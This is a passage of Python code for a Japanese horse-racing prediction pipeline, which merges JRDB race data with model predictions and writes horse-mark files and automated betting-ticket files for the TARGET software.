glob.glob(folder_path)\n file_df = pd.DataFrame({\"filename\": filelist})\n file_df.loc[:, \"date\"] = file_df[\"filename\"].apply(lambda x: dt.strptime(x[-12:-4], '%Y%m%d'))\n target_filelist = file_df[(file_df[\"date\"] >= self.start_date) & (file_df[\"date\"] <= self.end_date)][\"filename\"].tolist()\n return sorted(target_filelist)\n\n def set_result_df(self):\n race_table_base_df = self.ext.get_race_table_base().drop([\"馬場状態\", \"target_date\", \"距離\", \"芝ダ障害コード\", \"頭数\"], axis=1)\n race_table_base_df.loc[:, \"RACE_ID\"] = race_table_base_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"NENGAPPI\"]), axis=1)\n race_table_base_df.loc[:, \"file_id\"] = race_table_base_df[\"RACE_KEY\"].apply(lambda x: mu.convert_target_file(x))\n race_table_base_df.loc[:, \"nichiji\"] = 
race_table_base_df[\"RACE_KEY\"].apply(lambda x: mu.convert_kaiji(x[5:6]))\n race_table_base_df.loc[:, \"race_no\"] = race_table_base_df[\"RACE_KEY\"].str[6:8]\n raceuma_table_base_df = self.ext.get_raceuma_table_base()\n result_df = pd.merge(race_table_base_df, raceuma_table_base_df, on=\"RACE_KEY\")\n result_df.loc[:, \"距離\"] = result_df[\"距離\"].astype(int)\n\n cluster_raceuma_result_df = self.tf.cluster_raceuma_result_df(result_df, self.dict_path)\n factory_analyze_race_result_df = self.tf.factory_analyze_race_result_df(result_df, self.dict_path)\n\n raceuma_result_df = cluster_raceuma_result_df[[\"RACE_KEY\", \"UMABAN\", \"ru_cluster\", \"IDM結果\", \"レース馬コメント\"]]\n race_result_df = factory_analyze_race_result_df[\n [\"RACE_KEY\", \"target_date\", \"fa_1\", \"fa_2\", \"fa_3\", \"fa_4\", \"fa_5\", \"RAP_TYPE\", \"TRACK_BIAS_ZENGO\",\n \"TRACK_BIAS_UCHISOTO\", \"レースペース流れ\", \"レースコメント\"]]\n\n race_result_df.loc[:, \"val\"] = race_result_df[\"RAP_TYPE\"].apply(\n lambda x: mu.decode_rap_type(int(mu.encode_rap_type(x))))\n race_result_df.loc[:, \"TB_ZENGO\"] = race_result_df[\"TRACK_BIAS_ZENGO\"].apply(\n lambda x: mu._decode_zengo_bias(int(mu._encode_zengo_bias(x))))\n race_result_df.loc[:, \"TB_UCHISOTO\"] = race_result_df[\"TRACK_BIAS_UCHISOTO\"].apply(\n lambda x: mu._decode_uchisoto_bias(int(mu._calc_uchisoto_bias(x))))\n race_result_df.loc[:, \"RACE_PACE\"] = race_result_df[\"レースペース流れ\"].apply(\n lambda x: mu._decode_race_pace(int(mu._encode_race_pace(x))))\n race_result_df.loc[:, \"TB\"] = race_result_df.apply(lambda x: mu.convert_bias(x[\"TB_UCHISOTO\"], x[\"TB_ZENGO\"]),\n axis=1)\n race_result_df = race_result_df.groupby(\"RACE_KEY\").first().reset_index()\n race_result_df = pd.merge(race_result_df, self.race_base_df, on=\"RACE_KEY\")\n\n result_uchisoto_df = race_result_df[[\"RACE_KEY\", \"TB_UCHISOTO\", \"file_id\", \"nichiji\", \"race_no\"]].rename(\n columns={\"TB_UCHISOTO\": \"val\"})\n result_zengo_df = race_result_df[[\"RACE_KEY\", \"TB_ZENGO\", \"file_id\", \"nichiji\", \"race_no\"]].rename(\n columns={\"TB_ZENGO\": \"val\"})\n result_tb_df = race_result_df[[\"RACE_KEY\", \"TB\", \"file_id\", \"nichiji\", \"race_no\"]].rename(columns={\"TB\": \"val\"})\n\n raceuma_result_df = pd.merge(raceuma_result_df, race_result_df, on=\"RACE_KEY\")\n\n raceuma_result_df.loc[:, \"RACEUMA_ID\"] = raceuma_result_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n fa_df = raceuma_result_df[[\"RACEUMA_ID\", \"fa_1\", \"fa_2\", \"fa_3\", \"fa_4\", \"fa_5\", \"target_date\"]]\n self.race_result_df = race_result_df\n self.raceuma_result_df = raceuma_result_df\n\n def set_pred_df(self):\n win5_df = self.get_pred_df(\"win5\", \"WIN5_FLAG\")\n win5_df.loc[:, \"RACEUMA_ID\"] = win5_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n win5_df.loc[:, \"predict_std\"] = round(win5_df[\"predict_std\"], 2)\n win5_df.loc[:, \"predict_rank\"] = win5_df[\"predict_rank\"].astype(int)\n\n win_df = self.get_pred_df(\"win\", \"WIN_FLAG\")\n win_df.loc[:, \"RACEUMA_ID\"] = win_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n win_df.loc[:, \"predict_std\"] = round(win_df[\"predict_std\"], 2)\n win_df.loc[:, \"predict_rank\"] = win_df[\"predict_rank\"].astype(int)\n\n jiku_df = self.get_pred_df(\"win\", \"JIKU_FLAG\")\n jiku_df.loc[:, \"RACEUMA_ID\"] = jiku_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], 
axis=1)\n jiku_df.loc[:, \"predict_std\"] = round(jiku_df[\"predict_std\"], 2)\n jiku_df.loc[:, \"predict_rank\"] = jiku_df[\"predict_rank\"].astype(int)\n\n ana_df = self.get_pred_df(\"win\", \"ANA_FLAG\")\n ana_df.loc[:, \"RACEUMA_ID\"] = ana_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n ana_df.loc[:, \"predict_std\"] = round(ana_df[\"predict_std\"], 2)\n ana_df.loc[:, \"predict_rank\"] = ana_df[\"predict_rank\"].astype(int)\n score_df = pd.merge(win_df[[\"RACE_KEY\", \"UMABAN\", \"RACEUMA_ID\", \"predict_std\", \"target_date\"]].rename(\n columns={\"predict_std\": \"win_std\"}),\n jiku_df[[\"RACEUMA_ID\", \"predict_std\"]].rename(columns={\"predict_std\": \"jiku_std\"}),\n on=\"RACEUMA_ID\")\n score_df = pd.merge(score_df, ana_df[[\"RACEUMA_ID\", \"predict_std\"]].rename(columns={\"predict_std\": \"ana_std\"}),\n on=\"RACEUMA_ID\")\n score_df.loc[:, \"predict_std\"] = score_df[\"win_std\"] * self.win_rate / 100 + score_df[\"jiku_std\"] * self.jiku_rate / 100 + score_df[\"ana_std\"] * self.ana_rate / 100\n grouped_score_df = score_df.groupby(\"RACE_KEY\")\n score_df.loc[:, \"predict_rank\"] = grouped_score_df[\"predict_std\"].rank(\"dense\", ascending=False)\n score_df.loc[:, \"predict_std\"] = round(score_df[\"predict_std\"], 2)\n score_df.loc[:, \"predict_rank\"] = score_df[\"predict_rank\"].astype(int)\n nigeuma_df = self.get_pred_df(\"nigeuma\", \"NIGEUMA\")\n nigeuma_df.loc[:, \"RACEUMA_ID\"] = nigeuma_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n nigeuma_df.loc[:, \"predict_std\"] = round(nigeuma_df[\"predict_std\"], 2)\n nigeuma_df.loc[:, \"predict_rank\"] = nigeuma_df[\"predict_rank\"].astype(int)\n agari_df = self.get_pred_df(\"nigeuma\", \"AGARI_SAISOKU\")\n agari_df.loc[:, \"RACEUMA_ID\"] = agari_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n agari_df.loc[:, \"predict_std\"] = round(agari_df[\"predict_std\"], 2)\n agari_df.loc[:, \"predict_rank\"] = agari_df[\"predict_rank\"].astype(int)\n ten_df = self.get_pred_df(\"nigeuma\", \"TEN_SAISOKU\")\n ten_df.loc[:, \"RACEUMA_ID\"] = ten_df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n ten_df.loc[:, \"predict_std\"] = round(ten_df[\"predict_std\"], 2)\n ten_df.loc[:, \"predict_rank\"] = ten_df[\"predict_rank\"].astype(int)\n self.win5_df = win5_df\n self.win_df = win_df\n self.jiku_df = jiku_df\n self.ana_df = ana_df\n self.score_df = score_df\n self.nigeuma_df = nigeuma_df\n self.agari_df = agari_df\n self.ten_df = ten_df\n total_df = pd.concat([win_df, jiku_df, ana_df, nigeuma_df, agari_df, ten_df])[[\"RACE_KEY\", \"UMABAN\", \"target_date\", \"predict_rank\"]]\n point_df = total_df.copy()\n point_df.loc[:, \"predict_rank\"] = point_df[\"predict_rank\"].apply(lambda x: 5 if x == 1 else 4 if x == 2 else 3 if x == 3 else 2 if x == 4 else 1 if x == 5 else 0)\n ## 単純に順位が少ないものを評価\n total_df = total_df.groupby([\"RACE_KEY\", \"UMABAN\", \"target_date\"]).sum().reset_index()\n total_df.columns = [\"RACE_KEY\", \"UMABAN\", \"target_date\", \"VALUE\"]\n total_df.loc[:, \"predict_rank\"] = total_df.groupby(\"RACE_KEY\")[\"VALUE\"].rank(method='min')\n self.total_df = total_df\n\n ## 順位上位のものにpointをつけて評価\n point_df = point_df.groupby([\"RACE_KEY\", \"UMABAN\", \"target_date\"]).sum().reset_index()\n point_df.columns = [\"RACE_KEY\", \"UMABAN\", \"target_date\", \"VALUE\"]\n point_df.loc[:, \"predict_rank\"] = 
point_df.groupby(\"RACE_KEY\")[\"VALUE\"].rank(ascending=False, method='min')\n self.point_df = point_df\n\n def create_raceuma_score_file(self):\n for date in self.date_list:\n print(date)\n win5_temp_df = self.win5_df.query(f\"target_date == '{date}'\")[\n [\"RACEUMA_ID\", \"prob\", \"predict_rank\"]].sort_values(\"RACEUMA_ID\")\n win5_temp_df.loc[:, \"prob\"] = (win5_temp_df[\"prob\"] * 100 ).astype(\"int\")\n win5_temp_df.to_csv(self.ext_score_path + \"pred_win5/\" + date + \".csv\", header=False, index=False)\n\n win_temp_df = self.win_df.query(f\"target_date == '{date}'\")[\n [\"RACEUMA_ID\", \"prob\", \"predict_rank\"]].sort_values(\"RACEUMA_ID\")\n win_temp_df.loc[:, \"prob\"] = (win_temp_df[\"prob\"] * 100 ).astype(\"int\")\n win_temp_df.to_csv(self.ext_score_path + \"pred_win/\" + date + \".csv\", header=False, index=False)\n jiku_temp_df = self.jiku_df.query(f\"target_date == '{date}'\")[\n [\"RACEUMA_ID\", \"prob\", \"predict_rank\"]].sort_values(\"RACEUMA_ID\")\n jiku_temp_df.loc[:, \"prob\"] = (jiku_temp_df[\"prob\"] * 100 ).astype(\"int\")\n jiku_temp_df.to_csv(self.ext_score_path + \"pred_jiku/\" + date + \".csv\", header=False, index=False)\n ana_temp_df = self.ana_df.query(f\"target_date == '{date}'\")[\n [\"RACEUMA_ID\", \"prob\", \"predict_rank\"]].sort_values(\"RACEUMA_ID\")\n ana_temp_df.loc[:, \"prob\"] = (ana_temp_df[\"prob\"] * 100 ).astype(\"int\")\n ana_temp_df.to_csv(self.ext_score_path + \"pred_ana/\" + date + \".csv\", header=False, index=False)\n score_temp_df = self.score_df.query(f\"target_date == '{date}'\")[\n [\"RACEUMA_ID\", \"predict_std\", \"predict_rank\"]].sort_values(\"RACEUMA_ID\")\n score_temp_df.loc[:, \"predict_std\"] = score_temp_df[\"predict_std\"].round(0).astype(\"int\")\n score_temp_df.to_csv(self.ext_score_path + \"pred_score/\" + date + \".csv\", header=False, index=False)\n nigeuma_temp_df = self.nigeuma_df.query(f\"target_date == '{date}'\")[\n [\"RACEUMA_ID\", \"predict_std\", \"predict_rank\"]].sort_values(\"RACEUMA_ID\")\n nigeuma_temp_df.to_csv(self.ext_score_path + \"pred_nige/\" + date + \".csv\", header=False, index=False)\n agari_temp_df = self.agari_df.query(f\"target_date == '{date}'\")[\n [\"RACEUMA_ID\", \"predict_std\", \"predict_rank\"]].sort_values(\"RACEUMA_ID\")\n agari_temp_df.to_csv(self.ext_score_path + \"pred_agari/\" + date + \".csv\", header=False, index=False)\n ten_temp_df = self.ten_df.query(f\"target_date == '{date}'\")[\n [\"RACEUMA_ID\", \"predict_std\", \"predict_rank\"]].sort_values(\"RACEUMA_ID\")\n ten_temp_df.to_csv(self.ext_score_path + \"pred_ten/\" + date + \".csv\", header=False, index=False)\n\n def create_main_mark_file(self):\n umaren_are_df = self.get_pred_df(\"haito\", \"UMAREN_ARE\")[[\"RACE_KEY\", \"pred\"]].rename(\n columns={\"pred\": \"umaren_are\"})\n umatan_are_df = self.get_pred_df(\"haito\", \"UMATAN_ARE\")[[\"RACE_KEY\", \"pred\"]].rename(\n columns={\"pred\": \"umatan_are\"})\n sanrenpuku_are_df = self.get_pred_df(\"haito\", \"SANRENPUKU_ARE\")[[\"RACE_KEY\", \"pred\"]].rename(\n columns={\"pred\": \"sanrenpuku_are\"})\n are_df = pd.merge(umaren_are_df, umatan_are_df, on=\"RACE_KEY\")\n are_df = pd.merge(are_df, sanrenpuku_are_df, on=\"RACE_KEY\")\n are_df = pd.merge(self.race_base_df, are_df, on=\"RACE_KEY\", how=\"left\")\n are_df.loc[:, \"val\"] = are_df.apply(\n lambda x: mu.convert_are_flag(x[\"umaren_are\"], x[\"umatan_are\"], x[\"sanrenpuku_are\"]), axis=1)\n\n main_raceuma_df = pd.merge(self.score_df, self.race_base_df, on =\"RACE_KEY\")\n \"\"\" 馬1、レース1用のファイルを作成 \"\"\"\n 
for file in self.file_list:\n print(file)\n file_text = \"\"\n temp_df = self.race_base_df.query(f\"file_id == '{file}'\")\n nichiji_list = sorted(temp_df[\"nichiji\"].drop_duplicates())\n for nichiji in nichiji_list:\n temp2_df = temp_df.query(f\"nichiji == '{nichiji}'\")\n race_list = sorted(temp2_df[\"RACE_KEY\"].drop_duplicates())\n for race in race_list:\n line_text = \"\"\n temp_race_df = are_df.query(f\"RACE_KEY =='{race}'\")\n if not temp_race_df.empty:\n temp3_sr = temp_race_df.iloc[0]\n if temp3_sr[\"val\"] == temp3_sr[\"val\"]:\n line_text += temp3_sr[\"val\"]\n else:\n line_text += \" \"\n else:\n line_text += \" \"\n temp3_df = main_raceuma_df.query(f\"RACE_KEY == '{race}'\").sort_values(\"UMABAN\")\n i = 0\n for idx, val in temp3_df.iterrows():\n line_text += self._return_mark(val[\"predict_rank\"])\n i += 1\n if i != 18:\n for j in range(i, 18):\n line_text += \" \"\n file_text += line_text + '\\r\\n'\n with open(self.target_path + \"UM\" + file + \".DAT\", mode='w', encoding=\"shift-jis\") as f:\n f.write(file_text.replace('\\r', ''))\n\n\n def create_raceuma_mark_file(self):\n print(\"---- WIN5マーク --------\")\n mark_path_2 = self.target_path + \"UmaMark2/\"\n self._proc_create_um_mark_file(self.win5_df, mark_path_2)\n print(\"---- pointマーク --------\")\n mark_path_3 = self.target_path + \"UmaMark3/\"\n self._proc_create_um_mark_file(self.point_df, mark_path_3)\n print(\"---- 勝ちマーク --------\")\n mark_path_4 = self.target_path + \"UmaMark4/\"\n self._proc_create_um_mark_file(self.win_df, mark_path_4)\n print(\"---- 軸マーク --------\")\n mark_path_5 = self.target_path + \"UmaMark5/\"\n self._proc_create_um_mark_file(self.jiku_df, mark_path_5)\n print(\"---- nigeuma_df --------\")\n mark_path_6 = self.target_path + \"UmaMark6/\"\n self._proc_create_um_mark_file(self.nigeuma_df, mark_path_6)\n print(\"---- agari_df --------\")\n mark_path_7 = self.target_path + \"UmaMark7/\"\n self._proc_create_um_mark_file(self.agari_df, mark_path_7)\n print(\"---- 穴マーク --------\")\n mark_path_8 = self.target_path + \"UmaMark8/\"\n self._proc_create_um_mark_file(self.ana_df, mark_path_8)\n\n def _proc_create_um_mark_file(self, df, folder_path):\n \"\"\" ランクを印にして馬印ファイルを作成 \"\"\"\n df.loc[:, \"RACEUMA_ID\"] = df.apply(\n lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"target_date\"]) + x[\"UMABAN\"], axis=1)\n #df.loc[:, \"predict_std\"] = df[\"predict_std\"].round(2)\n df.loc[:, \"predict_rank\"] = df[\"predict_rank\"].astype(int)\n df = pd.merge(self.race_base_df[[\"RACE_KEY\", \"file_id\", \"nichiji\", \"race_no\"]], df, on=\"RACE_KEY\", how=\"left\")\n # file_list = df[\"file_id\"].drop_duplicates()\n for file in self.file_list:\n print(file)\n file_text = \"\"\n temp_df = df.query(f\"file_id == '{file}'\")\n nichiji_list = sorted(temp_df[\"nichiji\"].drop_duplicates())\n for nichiji in nichiji_list:\n temp2_df = temp_df.query(f\"nichiji == '{nichiji}'\")\n race_list = sorted(temp2_df[\"RACE_KEY\"].drop_duplicates())\n for race in race_list:\n line_text = \" \"\n temp3_df = temp2_df.query(f\"RACE_KEY == '{race}'\").sort_values(\"UMABAN\")\n i = 0\n for idx, val in temp3_df.iterrows():\n line_text += self._return_mark(val[\"predict_rank\"])\n i += 1\n if i != 18:\n for j in range(i, 18):\n line_text += \" \"\n file_text += line_text + '\\r\\n'\n with open(folder_path + \"UM\" + file + \".DAT\", mode='w', encoding=\"shift-jis\") as f:\n f.write(file_text.replace('\\r', ''))\n\n def create_target_mark_df(self):\n base_df = pd.concat([self.win_df, self.jiku_df, self.ana_df])\n mark_base_df = 
base_df[[\"RACE_KEY\", \"UMABAN\", \"target\", \"predict_std\"]].copy()\n mark_base_df = mark_base_df.set_index([\"RACE_KEY\", \"UMABAN\", \"target\"]).unstack(\"target\")\n mark_base_df.columns = [\"ANA_FLAG\", \"JIKU_FLAG\", \"WIN_FLAG\"]\n mark_base_df = mark_base_df.reset_index()\n mark_df = mark_base_df.copy()\n mark_df.loc[:, \"SCORE\"] = mark_df[\"WIN_FLAG\"] * self.win_rate / 100 + mark_base_df[\"JIKU_FLAG\"] / 100 * self.jiku_rate + mark_base_df[\"ANA_FLAG\"] * self.ana_rate / 100\n mark_df.loc[:, \"RANK\"] = mark_df.groupby(\"RACE_KEY\")[\"SCORE\"].rank(ascending=False)\n mark_prob_df = base_df[[\"RACE_KEY\", \"UMABAN\", \"target\", \"prob\"]].copy()\n mark_prob_df = mark_prob_df.set_index([\"RACE_KEY\", \"UMABAN\", \"target\"]).unstack(\"target\")\n mark_prob_df.columns = [\"ana_prob\", \"jiku_prob\", \"win_prob\"]\n mark_prob_df = mark_prob_df.reset_index()\n self.target_mark_df = pd.merge(mark_df, mark_prob_df, on=[\"RACE_KEY\", \"UMABAN\"])\n\n race_df = self.ext.get_race_before_table_base()\n base_term_df = race_df.query(f\"NENGAPPI >= '{self.term_start_date}' and NENGAPPI <= '{self.term_end_date}'\")[[\"RACE_KEY\"]].copy()\n self.race_df = race_df[[\"RACE_KEY\", \"距離\", \"芝ダ障害コード\", \"種別\", \"条件\", \"天候コード\", \"芝馬場状態コード\", \"ダ馬場状態コード\", \"target_date\"]].copy()\n self.race_df.loc[:, \"年月\"] = self.race_df[\"target_date\"].str[0:6]\n self.race_df = pd.merge(self.race_df, base_term_df, on=\"RACE_KEY\")\n\n res_raceuma_df = self.ext.get_raceuma_table_base()[[\"RACE_KEY\", \"UMABAN\", \"着順\", \"確定単勝オッズ\", \"確定単勝人気順位\", \"レース脚質\", \"単勝\", \"複勝\", \"テン指数結果順位\", \"上がり指数結果順位\"]].copy()\n self.res_raceuma_df = res_raceuma_df\n\n def create_vote_file(self):\n target_df = self.target_mark_df.copy()\n print(target_df.shape)\n print(target_df.iloc[0])\n sim = Simulation(self.start_date, self.end_date, False, target_df)\n tansho_target_bet_df = pd.DataFrame(); fukusho_target_bet_df = pd.DataFrame(); umaren_target_bet_df = pd.DataFrame()\n umatan_target_bet_df = pd.DataFrame(); wide_target_bet_df = pd.DataFrame(); sanrenpuku_target_bet_df = pd.DataFrame()\n print(\"--- tansho ----\")\n if self.tansho_flag:\n print(f\" 条件: {self.tansho_cond} オッズ:{self.tansho_odds_cond}\")\n tansho_kaime_df = sim.create_tansho_base_df(self.tansho_cond)\n print(tansho_kaime_df.shape)\n tansho_target_bet_df = self._get_tansho_bet_df(tansho_kaime_df)\n print(tansho_target_bet_df.shape)\n print(\"--- fukusho ----\")\n if self.fukusho_flag:\n print(f\" 条件: {self.fukusho_cond} オッズ:{self.fukusho_odds_cond}\")\n fukusho_kaime_df = sim.create_fukusho_base_df(self.fukusho_cond)\n print(fukusho_kaime_df.shape)\n fukusho_target_bet_df = self._get_fukusho_bet_df(fukusho_kaime_df)\n print(fukusho_target_bet_df.shape)\n print(\"--- umaren ----\")\n if self.umaren_flag:\n print(f\" 条件: {self.umaren1_cond}/ {self.umaren2_cond} オッズ:{self.umaren_odds_cond}\")\n umaren_kaime_df = sim.create_umaren_base_df(self.umaren1_cond, self.umaren2_cond)\n print(umaren_kaime_df.shape)\n umaren_target_bet_df = self._get_umaren_bet_df(umaren_kaime_df)\n print(umaren_target_bet_df.shape)\n print(\"--- umatan ----\")\n if self.umatan_flag:\n print(f\" 条件: {self.umatan1_cond}/ {self.umatan2_cond} オッズ:{self.umatan_odds_cond}\")\n umatan_kaime_df = sim.create_umatan_base_df(self.umatan1_cond, self.umatan2_cond)\n print(umatan_kaime_df.shape)\n umatan_target_bet_df = self._get_umatan_bet_df(umatan_kaime_df)\n print(umatan_target_bet_df.shape)\n print(\"--- wide ----\")\n if self.wide_flag:\n print(f\" 条件: {self.wide1_cond}/ {self.wide2_cond} 
オッズ:{self.wide_odds_cond}\")\n wide_kaime_df = sim.create_wide_base_df(self.wide1_cond, self.wide2_cond)\n print(wide_kaime_df.shape)\n wide_target_bet_df = self._get_wide_bet_df(wide_kaime_df)\n print(wide_target_bet_df.shape)\n print(\"--- sanrenpuku ----\")\n if self.sanrenpuku_flag:\n print(f\" 条件: {self.sanrenpuku1_cond}/ {self.sanrenpuku2_cond}/ {self.sanrenpuku3_cond} オッズ:{self.sanrenpuku_odds_cond}\")\n sanrenpuku_kaime_df = sim.create_sanrenpuku_base_df(self.sanrenpuku1_cond, self.sanrenpuku2_cond, self.sanrenpuku3_cond)\n sanrenpuku_target_bet_df = self._get_sanrenpuku_bet_df(sanrenpuku_kaime_df)\n print(sanrenpuku_target_bet_df.shape)\n target_bet_df = pd.concat([tansho_target_bet_df, fukusho_target_bet_df, umaren_target_bet_df, umatan_target_bet_df, wide_target_bet_df, sanrenpuku_target_bet_df])\n target_bet_df = target_bet_df.sort_values([\"RACE_ID\", \"エリア\", \"券種\", \"購入金額\", \"目1\", \"目2\", \"目3\"])\n target_bet_df = target_bet_df.drop_duplicates(subset=[\"RACE_ID\", \"券種\", \"目1\", \"目2\", \"目3\"])\n target_bet_df.to_csv(self.auto_bet_path + \"target_bet.csv\", index=False, header=False)\n self.target_bet_df = target_bet_df\n\n def _get_tansho_bet_df(self, kaime_df):\n if len(kaime_df.index) == 0:\n print(\"_get_tansho_bet_df -- no data--\")\n return pd.DataFrame(columns=self.kaime_columns)\n # tansho_base_df = self.get_tansho_target_df(target_df)\n bet_df = kaime_df.query(self.tansho_odds_cond).copy()\n if len(bet_df.index) == 0:\n return pd.DataFrame(columns=self.kaime_columns)\n else:\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN\"]\n bet_df.loc[:, \"目2\"] =\"\"\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"券種\"] = '0'\n # bet_df.loc[:, \"オッズ\"] = bet_df[\"単勝オッズ\"]\n target_bet_df = self._get_target_bet_df(bet_df)\n return target_bet_df\n\n def _get_fukusho_bet_df(self, kaime_df):\n if len(kaime_df.index) == 0:\n print(\"_get_fukusho_bet_df -- no data--\")\n return pd.DataFrame(columns=self.kaime_columns)\n # tansho_base_df = self.get_fukusho_target_df(target_df)\n bet_df = kaime_df.query(self.fukusho_odds_cond).copy()\n if len(bet_df.index) == 0:\n return pd.DataFrame(columns=self.kaime_columns)\n else:\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN\"]\n bet_df.loc[:, \"目2\"] =\"\"\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"券種\"] = '1'\n # bet_df.loc[:, \"オッズ\"] = bet_df[\"複勝オッズ\"]\n target_bet_df = self._get_target_bet_df(bet_df)\n return target_bet_df\n\n def _get_umaren_bet_df(self, kaime_df):\n if len(kaime_df.index) == 0:\n print(\"_get_umaren_bet_df -- no data--\")\n return pd.DataFrame(columns=self.kaime_columns)\n #umaren_base_df = self.get_umaren_target_df(uma1_df, uma2_df)\n bet_df = kaime_df.query(self.umaren_odds_cond).copy()\n if len(bet_df.index) == 0:\n return pd.DataFrame(columns=self.kaime_columns)\n else:\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN\"].apply(lambda x: x[0])\n bet_df.loc[:, \"目2\"] =bet_df[\"UMABAN\"].apply(lambda x: x[1])\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"券種\"] = '3'\n target_bet_df = self._get_target_bet_df(bet_df)\n return target_bet_df\n\n def _get_umatan_bet_df(self, kaime_df):\n if len(kaime_df.index) == 0:\n print(\"_get_umatan_bet_df -- no data--\")\n return pd.DataFrame(columns=self.kaime_columns)\n # umatan_base_df = self.get_umatan_target_df(uma1_df, uma2_df)\n bet_df = kaime_df.query(self.umatan_odds_cond).copy()\n if len(bet_df.index) == 0:\n return pd.DataFrame(columns=self.kaime_columns)\n else:\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN\"].apply(lambda x: x[0])\n bet_df.loc[:, \"目2\"] 
=bet_df[\"UMABAN\"].apply(lambda x: x[1])\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"券種\"] = '5'\n target_bet_df = self._get_target_bet_df(bet_df)\n return target_bet_df\n\n def _get_wide_bet_df(self, kaime_df):\n if len(kaime_df.index) == 0:\n print(\"_get_wide_bet_df -- no data--\")\n return pd.DataFrame(columns=self.kaime_columns)\n #wide_base_df = self.get_wide_target_df(uma1_df, uma2_df)\n bet_df = kaime_df.query(self.wide_odds_cond).copy()\n if len(bet_df.index) == 0:\n return pd.DataFrame(columns=self.kaime_columns)\n else:\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN\"].apply(lambda x: x[0])\n bet_df.loc[:, \"目2\"] =bet_df[\"UMABAN\"].apply(lambda x: x[1])\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"券種\"] = '4'\n target_bet_df = self._get_target_bet_df(bet_df)\n return target_bet_df\n\n def _get_sanrenpuku_bet_df(self, kaime_df):\n if len(kaime_df.index) == 0:\n print(\"_get_sanrenpuku_bet_df -- no data--\")\n return pd.DataFrame(columns=self.kaime_columns)\n #sanrenpuku_base_df = self.get_sanrenpuku_target_df(uma1_df, uma2_df, uma3_df)\n bet_df = kaime_df.query(self.sanrenpuku_odds_cond).copy()\n if len(bet_df.index) == 0:\n return pd.DataFrame(columns=self.kaime_columns)\n else:\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN\"].apply(lambda x: x[0])\n bet_df.loc[:, \"目2\"] =bet_df[\"UMABAN\"].apply(lambda x: x[1])\n bet_df.loc[:, \"目3\"] =bet_df[\"UMABAN\"].apply(lambda x: x[2])\n bet_df.loc[:, \"券種\"] = '6'\n target_bet_df = self._get_target_bet_df(bet_df)\n return target_bet_df\n\n def get_tansho_target_df(self, uma1_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"])\n odds_df = self.ext.get_odds_df(\"単勝\")\n odds_df = odds_df[[\"RACE_KEY\", \"UMABAN\", \"単勝オッズ\"]]\n target_df = pd.merge(add_uma1_df, odds_df, on=[\"RACE_KEY\", \"UMABAN\"])\n return target_df\n\n def get_fukusho_target_df(self, uma1_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"])\n odds_df = self.ext.get_odds_df(\"複勝\")\n odds_df = odds_df[[\"RACE_KEY\", \"UMABAN\", \"複勝オッズ\"]]\n target_df = pd.merge(add_uma1_df, odds_df, on=[\"RACE_KEY\", \"UMABAN\"])\n return target_df\n\n def get_umaren_target_df(self, uma1_df, uma2_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"_1\").rename(columns={\"RACE_KEY_1\":\"RACE_KEY\"})\n add_uma2_df = pd.merge(uma2_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"_2\").rename(columns={\"RACE_KEY_2\":\"RACE_KEY\"})\n odds_df = self.ext.get_odds_df(\"馬連\")\n base_uma1_df = pd.merge(uma1_df[[\"RACE_KEY\", \"UMABAN\"]], odds_df, on=[\"RACE_KEY\", \"UMABAN\"]).set_index([\"RACE_KEY\", \"UMABAN\"])\n umaren_uma1_df = base_uma1_df[['馬連オッズ01', '馬連オッズ02', '馬連オッズ03', '馬連オッズ04', '馬連オッズ05', '馬連オッズ06', '馬連オッズ07', '馬連オッズ08', '馬連オッズ09',\n '馬連オッズ10', '馬連オッズ11', '馬連オッズ12', '馬連オッズ13', '馬連オッズ14', '馬連オッズ15', '馬連オッズ16', '馬連オッズ17', '馬連オッズ18']].copy()\n umaren_uma1_df.columns = [\"01\", \"02\", \"03\", \"04\", \"05\", \"06\", \"07\", \"08\", \"09\", \"10\", \"11\", \"12\", \"13\", \"14\", \"15\", \"16\", \"17\", \"18\"]\n umaren_uma1_df = umaren_uma1_df.stack().reset_index()\n umaren_uma1_df.columns = [\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\", \"オッズ\"]\n target_df = pd.merge(umaren_uma1_df, self.race_df, on=\"RACE_KEY\")\n target_df = pd.merge(target_df, add_uma1_df, on=[\"RACE_KEY\", \"UMABAN_1\"])\n target_df = pd.merge(target_df, add_uma2_df, on=[\"RACE_KEY\", 